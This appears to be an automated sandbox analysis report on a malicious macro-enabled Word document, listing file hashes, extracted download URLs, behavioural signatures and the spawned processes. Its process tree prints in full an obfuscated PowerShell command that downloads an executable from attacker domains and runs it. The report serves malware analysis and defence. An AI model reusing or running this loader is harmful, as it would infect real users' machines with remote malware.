Analysis
-
max time kernel
109s -
max time network
113s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
19-09-2024 05:56
General
-
Target
malware300.docm
-
Size
75KB
-
MD5
f1cd8322fa2f0a04c9b04d2f5adb6513
-
SHA1
25a72fd4bdfdefabd776900af126f17a6acdcc04
-
SHA256
bcb9649566030305c43a0e9267e4d9a4c208e94cee552cc5832945ba95930076
-
SHA512
562435c3e72dca717ade9d12e7538d8a55e63e64f96b2e0f524475bf20f5a079b37b558211c31d87c13b5425b790797ebf69cf34fcc52d24cd34f74c2a1766c1
-
SSDEEP
1536:sToxKs4T4G4O95lX/5hMXzxJVJF5Pef9m/Fmq5rqFFiIyyyDHQYEzO:EoTy4G4Sbk/VJF5V75OLzyyyEYEa
Malware Config
Extracted
http://gokeenakte.top/admin.php?f=1,http://videoanalystes.webcam/admin.php?f=1,http://photographypointer.men/admin.php?f=1
http://gokeenakte.top/admin.php?f=1
http://videoanalystes.webcam/admin.php?f=1
http://photographypointer.men/admin.php?f=1
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Start PowerShell.
-
Drops file in Windows directory 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\malware300.docm"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mYRg = new-object System.Net.WebClient;$eLcL = new-object random; $qcVYBGR = 'hnXFrtnXFrtnXFrpnXFr:nXFr/nXFr/nXFrgnXFronXFrknXFrenXFrenXFrnnXFranXFrknXFrtnXFrenXFr.nXFrtnXFronXFrpnXFr/nXFranXFrdnXFrmnXFrinXFrnnXFr.nXFrpnXFrhnXFrpnXFr?nXFrfnXFr=nXFr1nXFr,nXFrhnXFrtnXFrtnXFrpnXFr:nXFr/nXFr/nXFrvnXFrinXFrdnXFrenXFronXFranXFrnnXFranXFrlnXFrynXFrsnXFrtnXFrenXFrsnXFr.nXFrwnXFrenXFrbnXFrcnXFranXFrmnXFr/nXFranXFrdnXFrmnXFrinXFrnnXFr.nXFrpnXFrhnXFrpnXFr?nXFrfnXFr=nXFr1nXFr,nXFrhnXFrtnXFrtnXFrpnXFr:nXFr/nXFr/nXFrpnXFrhnXFronXFrtnXFronXFrgnXFrrnXFranXFrpnXFrhnXFrynXFrpnXFronXFrinXFrnnXFrtnXFrenXFrrnXFr.nXFrmnXFrenXFrnnXFr/nXFranXFrdnXFrmnXFrinXFrnnXFr.nXFrpnXFrhnXFrpnXFr?nXFrfnXFr=nXFr1' -replace 'nXFr', '';$bgkEHeJDiO = $qcVYBGR.Split(',');$dRdkqYLYer = $eLcL.next(1, 65536);$nmLnTiCn = $env:temp + '\' + $dRdkqYLYer + '.exe';foreach($crvyHl in $bgkEHeJDiO){try{$mYRg.DownloadFile($crvyHl.ToString(), $nmLnTiCn);Start-Process $nmLnTiCn;break;}catch{write-host $_.Exception.Message;}}2⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD514dd5723ef576e7bbc9410362ca8e5f5
SHA16f4ce375fe9c381634908c9b89c1b387b03bdccf
SHA25609d5344377fe6fa823d9b45f4a4ade5e9150d582735b56c41092a6cb86ed5b88
SHA51211153b95569eb564beb5d42f79963faabec733170bd3e297f12cece370c84ef200909fec3919f3a989aa664a60b19f66630531092128216b4657a7125089f8ae
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
44KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
64KB